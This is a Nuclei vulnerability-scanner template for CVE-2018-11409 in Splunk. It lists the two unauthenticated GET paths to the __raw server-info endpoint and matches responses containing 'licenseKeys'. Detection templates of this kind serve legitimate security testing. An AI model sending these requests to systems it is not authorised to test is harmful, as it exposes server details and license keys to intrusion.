nuclei-templates/cves/2018/CVE-2018-11409.yaml

33 lines
1.0 KiB
YAML

id: CVE-2018-11409
info:
name: Splunk Sensitive Information Disclosure
author: harshbothra_
severity: medium
description: Splunk through 7.0.1 allows information disclosure by appending __raw/services/server/info/server-info?output_mode=json to a query, as demonstrated by discovering a license key.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2018-11409
- https://github.com/kofa2002/splunk
- https://www.exploit-db.com/exploits/44865/
- http://www.securitytracker.com/id/1041148
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2018-11409
cwe-id: CWE-200
tags: cve,cve2018,splunk
requests:
- method: GET
path:
- '{{BaseURL}}/en-US/splunkd/__raw/services/server/info/server-info?output_mode=json'
- '{{BaseURL}}/__raw/services/server/info/server-info?output_mode=json'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- licenseKeys